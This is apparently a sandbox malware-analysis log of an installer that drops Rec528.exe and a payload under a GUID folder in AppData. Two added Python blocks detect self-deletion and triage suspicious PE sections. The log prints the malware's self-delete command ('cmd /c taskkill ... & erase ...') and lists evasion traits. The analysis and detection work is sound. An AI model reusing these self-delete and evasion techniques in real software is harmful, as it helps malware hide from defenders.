Source: 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000002.447399623.0000000000410000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe Binary or memory string: OriginalFilename" vs 1ibwQtrqNy.exe
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
Source: Rec528.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1ibwQtrqNy.exe Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File read: C:\Users\user\Desktop\1ibwQtrqNy.exe
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\1ibwQtrqNy.exe C:\Users\user\Desktop\1ibwQtrqNy.exe
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp "C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp" /SL4 $2048E "C:\Users\user\Desktop\1ibwQtrqNy.exe" 1911253 52224
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process created: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe"
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f
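Two things in the process chain above are worth turning into detections: Rec528.exe launches cmd.exe with taskkill /im "Rec528.exe" /f & erase "...\Rec528.exe" to remove its own image once the payload is running, and that payload (IFLIjCfKSqd.exe) runs from a GUID-named folder under AppData\Roaming. The installer stages before that (is-XXXXX.tmp run with /SL4) are the normal Inno Setup loader and not an indicator on their own. The following is an added example for this page, not code from the sandbox or the malware: it applies both checks to constructed Sysmon-style process-creation events. The images and command lines are the ones logged above; the PIDs and the last, benign event are made up.

```python
"""Process-tree checks for the two behaviours above: a binary that spawns cmd.exe to taskkill and
erase its own image, and a payload launched from a GUID-named folder under AppData\\Roaming."""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed Sysmon-style process-creation events. Images and command lines come from the
# report; PIDs and the final (benign) event are made up for this example.
EVENTS: List[Dict] = [
    {"pid": 4012, "image": r"C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe",
     "parent_image": r"C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp",
     "cmdline": r'"C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe"'},
    {"pid": 4100,
     "image": r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe",
     "parent_image": r"C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe"},
    {"pid": 4150, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & '
                r'erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit'},
    # Benign contrast: an installer deleting a log file, not its own image.
    {"pid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c del "C:\Users\user\AppData\Local\Temp\install.log"'},
]

# taskkill [/f] /im <name>  -- captures the image name, with or without quotes
TASKKILL_RE = re.compile(r'taskkill(?:\.exe)?\s+(?:/f\s+)?/im\s+"?([^"\s]+)"?', re.I)
# erase|del <path> up to the next '&' or end of line -- captures the path without quotes
ERASE_RE = re.compile(r'\b(?:erase|del)\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)
# ...\AppData\Roaming\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\<name>.exe
GUID_EXE_RE = re.compile(
    r'\\AppData\\Roaming\\\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}\\[^\\]+\.exe$', re.I)


def detect_self_delete(events: List[Dict]) -> List[str]:
    """cmd.exe whose command line kills the parent's image name AND erases the parent's path."""
    findings: List[str] = []
    for ev in events:
        if PureWindowsPath(ev["image"]).name.lower() != "cmd.exe":
            continue
        parent = PureWindowsPath(ev["parent_image"])
        kill = TASKKILL_RE.search(ev["cmdline"])
        erase = ERASE_RE.search(ev["cmdline"])
        kills_parent = bool(kill) and kill.group(1).lower() == parent.name.lower()
        erases_parent = bool(erase) and erase.group(1).strip().lower() == str(parent).lower()
        if kills_parent and erases_parent:
            findings.append(f"pid {ev['pid']}: cmd.exe spawned by {parent.name} "
                            f"kills and erases its parent image")
    return findings


def detect_guid_dir_launch(events: List[Dict]) -> List[int]:
    """PIDs of executables started from %AppData%\\Roaming\\{GUID}\\, the drop location seen above."""
    return [ev["pid"] for ev in events if GUID_EXE_RE.search(ev["image"])]


if __name__ == "__main__":
    print(detect_self_delete(EVENTS))
    print(detect_guid_dir_launch(EVENTS))
```

Requiring both the taskkill and the erase to name the parent keeps ordinary "cmd /c del <tempfile>" cleanup out of the results. The WMI Win32_Process query attributed to taskkill.exe further down is taskkill's own process lookup and needs no separate rule; the cmd.exe command line is the evidence.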
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CBC4E70, 0_2_0040910C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CBC4E70, 1_2_00453D80
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Rec528.exe")
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/23@0/4
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B40
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004547A0 GetModuleHandleA,6C8D5550,GetDiskFreeSpaceA, 1_2_004547A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402C00
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040B090 FindResourceA,FreeResource, 1_2_0040B090
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: `a}{ 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: MFE. 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: ZK]Z 2_2_00409670
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1ibwQtrqNy.exe Static file information: File size 2146015 > 1048576

Data Obfuscation

Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fls528:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00406594 push 004065D1h; ret 0_2_004065C9
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00408BDC push 00408C0Fh; ret 0_2_00408C07
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax 0_2_00407F41
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00409A20 push 00409A5Dh; ret 1_2_00409A55
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040A107 push ds; ret 1_2_0040A108
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax 1_2_004302D5
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax 1_2_004063C1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004785C8 push 00478673h; ret 1_2_0047866B
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00410798 push ecx; mov dword ptr [esp], edx 1_2_0041079D
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004129F0 push 00412A53h; ret 1_2_00412A4B
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax 1_2_0045AAA1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00450EB4 push 00450EE7h; ret 1_2_00450EDF
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx 1_2_0040D0F2
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx 1_2_00443534
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx 1_2_0040F652
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx 1_2_00479B25
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx 1_2_00419CF5
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F43A push ecx; ret 2_2_0040F44D
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000E823 push ecx; ret 2_2_1000E836
Source: Rec528.exe.1.dr Static PE information: section name: .fls528
Source: initial sample Static PE information: section name: .text entropy: 7.436915831767785
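The static findings in this section fit together: the unpacked Rec528.exe carries a section with a non-standard name (.fls528) that is both writable and executable, its .text section has a reserved characteristics bit set (reported as IMAGE_SCN_MEM_PURGEABLE / IMAGE_SCN_MEM_16BIT, which share the value 0x00020000), the initial sample's .text entropy of 7.44 is in packed-code territory, and the file characteristics include the deprecated RELOCS_STRIPPED and BYTES_REVERSED_LO/HI flags. The following is an added example for this page, not the sandbox's or the malware's code: a self-contained PE section-table parser that flags each of those traits. Because the real sample is not embedded here, it builds a constructed PE32 image in memory whose section layout is modelled on the report; the entropy threshold (7.0) and the list of "common" section names are assumptions.

```python
"""Static triage of a PE section table, written to flag the traits this report lists for the
unpacked Rec528.exe: a writable+executable section with a non-standard name (.fls528),
a high-entropy code section, a reserved section flag, and deprecated file characteristics."""
import hashlib
import math
import struct
from typing import Dict, List, Tuple

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_LOCAL_SYMS_STRIPPED = 0x0008
IMAGE_FILE_BYTES_REVERSED_LO = 0x0080
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_BYTES_REVERSED_HI = 0x8000
DEPRECATED_FILE_FLAGS = (IMAGE_FILE_RELOCS_STRIPPED | IMAGE_FILE_BYTES_REVERSED_LO
                         | IMAGE_FILE_BYTES_REVERSED_HI)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_16BIT = 0x00020000   # reserved bit; tools also print it as IMAGE_SCN_MEM_PURGEABLE
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".tls", ".rsrc", ".reloc", ".idata",
                        ".edata", ".pdata", ".bss", ".crt", ".xdata", ".didat"}  # assumed list
HIGH_ENTROPY = 7.0   # assumed threshold; the report's packed .text scored 7.44


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, up to 8.0 for uniform random)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> Tuple[int, List[Dict]]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size        # section headers follow the optional header
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "flags": flags,
                         "entropy": entropy(pe[rawptr:rawptr + rawsize])})
    return characteristics, sections


def triage(pe: bytes) -> List[Tuple[str, str]]:
    """Return (section or '<file>', finding) pairs for the traits worth a second look."""
    characteristics, sections = parse_sections(pe)
    findings: List[Tuple[str, str]] = []
    if characteristics & DEPRECATED_FILE_FLAGS:
        findings.append(("<file>", "deprecated-characteristics"))
    for s in sections:
        f = s["flags"]
        if s["name"].lower() not in COMMON_SECTION_NAMES:
            findings.append((s["name"], "nonstandard-name"))
        if f & IMAGE_SCN_MEM_WRITE and f & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "writable-and-executable"))
        if f & IMAGE_SCN_CNT_CODE and s["entropy"] > HIGH_ENTROPY:
            findings.append((s["name"], "high-entropy-code"))
        if f & IMAGE_SCN_MEM_16BIT:
            findings.append((s["name"], "reserved-bit-0x20000"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the real sample): .text (E R, reserved bit, packed-looking),
    .rdata (R), .fls528 (E W), with the deprecated file flags the report lists."""
    def noise(n: int) -> bytes:   # deterministic high-entropy filler via SHA-256 chaining
        out, h = bytearray(), b"seed"
        while len(out) < n:
            h = hashlib.sha256(h).digest()
            out += h
        return bytes(out[:n])
    specs = [
        (b".text", noise(4096),
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_16BIT),
        (b".rdata", b"Rec528 strings\0" * 64, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
        (b".fls528", b"\0" * 512, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
    ]
    opt_size, align = 224, 0x200        # PE32 optional header size, file alignment
    headers_len = (0x40 + 4 + 20 + opt_size + 40 * len(specs) + align - 1) // align * align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, opt_size,
                       IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE
                       | IMAGE_FILE_LOCAL_SYMS_STRIPPED | DEPRECATED_FILE_FLAGS)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)         # Magic = PE32, rest zeroed
    table, body, rawptr, vaddr = b"", b"", headers_len, 0x1000
    for name, data, flags in specs:
        rawsize = (len(data) + align - 1) // align * align
        table += struct.pack("<8sIIIIIIHHI", name, len(data), vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
        vaddr += (rawsize + 0xFFF) // 0x1000 * 0x1000
    return (dos + b"PE\0\0" + coff + opt + table).ljust(headers_len, b"\0") + body


if __name__ == "__main__":
    for section, finding in triage(build_sample_pe()):
        print(f"{section:10} {finding}")
```

Two caveats when reading the output against a real file. The deprecated characteristics flags are set routinely by Delphi-built binaries, which includes Inno Setup installers like the outer 1ibwQtrqNy.exe, so on their own they are a compiler fingerprint rather than a verdict. And the "EW" on .fls528 comes from an in-memory dump of the unpacked module, so the bits may have been set at run time by the unpacker stub (note the VirtualProtect calls listed for both processes) rather than at link time; the section name itself is the durable indicator.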
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_iscrypt.dll
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\is-Q8OGG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\is-U3J98.tmp
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00478118
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0042425C IsIconic,SetActiveWindow, 1_2_0042425C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus, 1_2_004242A4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041844C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422924
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417660 IsIconic,GetCapture, 1_2_00417660
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417D96 IsIconic,SetWindowPos, 1_2_00417D96
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417D98
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: NOOPENFILEERRORBOX (4 times)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (5 times)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX (18 times)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe TID: 1556 Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\is-Q8OGG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\is-U3J98.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\unins000.exe (copy)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409764
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0048AC5C FindFirstFileA,6C8D69D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
